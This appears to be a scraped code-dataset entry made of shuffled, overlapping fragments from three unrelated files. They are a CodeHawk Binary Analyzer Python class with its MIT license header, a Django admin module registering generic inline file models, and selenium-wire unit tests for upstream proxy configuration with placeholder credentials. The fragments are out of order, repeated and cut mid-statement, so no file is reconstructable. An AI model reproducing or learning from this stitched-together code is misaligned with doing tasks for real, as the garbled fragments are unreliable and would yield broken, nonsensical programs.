# # THE SOFTWARE", "] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter()", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "<NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020", "this software and associated documentation files (the \"Software\"), to deal # in the", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "copyright notice and this permission notice shall be included in all # copies", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "(c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free of", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology", "in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters()", "Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT)", "charge, to any person obtaining a copy # of this software and associated", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "USE OR OTHER DEALINGS IN THE # SOFTWARE. 
# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import", "= xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return", "to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ #", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "<reponame>psifertex/CodeHawk-Binary # ------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results #", "# # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby", "Technology LLC # # Permission is hereby granted, free of charge, to any", "of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The", "granted, free of charge, to any person obtaining a copy # of this", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
# ------------------------------------------------------------------------------", "# copies of the Software, and to permit persons to whom the Software", "self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self):", "return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "# ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "to whom the Software is # furnished to do so, subject to the", "DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self):", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free", "# The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC", "permission notice shall be included in all # copies or substantial portions of", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, 
INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "be included in all # copies or substantial portions of the Software. #", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode):", "self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return", "# Permission is hereby granted, free of charge, to any person obtaining a", "self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return", "SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary =", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par')", "in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters()", "OTHER DEALINGS IN THE # SOFTWARE. 
# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "notice and this permission notice shall be included in all # copies or" ]
[ "import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines =", "<reponame>naritotakizawa/django-genericforeignkey-sample from django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post,", "File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class", "import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class", "class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post,", "= File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment,", "FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines =", "django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment", ".models import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines", "GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File class", "Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin):", "inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post, PostAdmin) admin.site.register(File)", "from django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File,", "from 
django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model", "model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline]", "import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File", "class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines", "from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin):", "PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post, PostAdmin)", "admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline):", "File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin)", "django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model =", "Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline]" ]
[ "https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options =", "http.hostport) # The dict config overrides that defined in env variables https =", "proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http']", "proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' }", "{ 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http", "= { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy", "unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options =", "get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) #", "'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3',", "'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http =", 
"self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "{ 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy =", "https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'):", "GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy':", "http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2',", "temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally: os.environ.clear() os.environ.update(old_environ)", "self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': {", "'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) 
self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options", "} proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https':", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self):", "http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The", "self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env", "https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options)", "manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield", "def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } }", "{ 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy =", "self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with 
self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888',", "proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config", "self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "= get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport)", "overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username)", "env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport)", "https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy", "self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http =", "'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http']", "self.assertEqual('username1', http.username) 
self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username)", "get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https':", "https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy =", "'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options)", "test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ):", "self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment", "from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': {", "NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost',", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) 
self.assertEqual({}, proxy)", "http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env variables", "test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with", "http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that", "https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options =", "= get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport)", "'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http =", "self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = {", "self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888',", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy':", "} with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme)", "options = { 'proxy': { 'http': 
'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } }", "self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport)", "https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy':", "https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',", "dict config overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme)", "{ 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'):", "None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used", "with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https", "test_get_config(self): options = { 'proxy': { 'http': 
'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' }", "config overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3',", "self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager", "def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost'", "http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost',", "self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides", "= proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict", "The dict config overrides that defined in env variables https = proxy['https'] self.assertEqual('https',", "in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888',", "self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy", "'https': 'https://username2:password2@server2:8888', 
'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http',", "self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with", "proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def", "seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http':", "self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None", "import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def", "'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options)", "os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self):", "self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env variables https", "'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http']", "= get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily", "'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] 
self.assertEqual('http', http.scheme)", "NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http", "from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options", "proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888',", "self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined", "\"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try:", "@contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ", "class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888',", "get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https", "http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https =", "https = 
proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy'])", "} } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self):", "get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set", "proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888',", "http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2',", "self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options", "self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password)", "https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with 
self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http", "def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self,", "proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\"", "= { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888',", "HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1',", "self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({})", "TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy':", "def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http',", "http.username) self.assertEqual('password1', http.password) 
self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self):", "self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost'", "contextlib import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase):", "= None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager", "proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https',", "= proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https']", "# The dict config overrides that defined in env variables https = proxy['https']", "def set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ =", "with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "= proxy['https'] 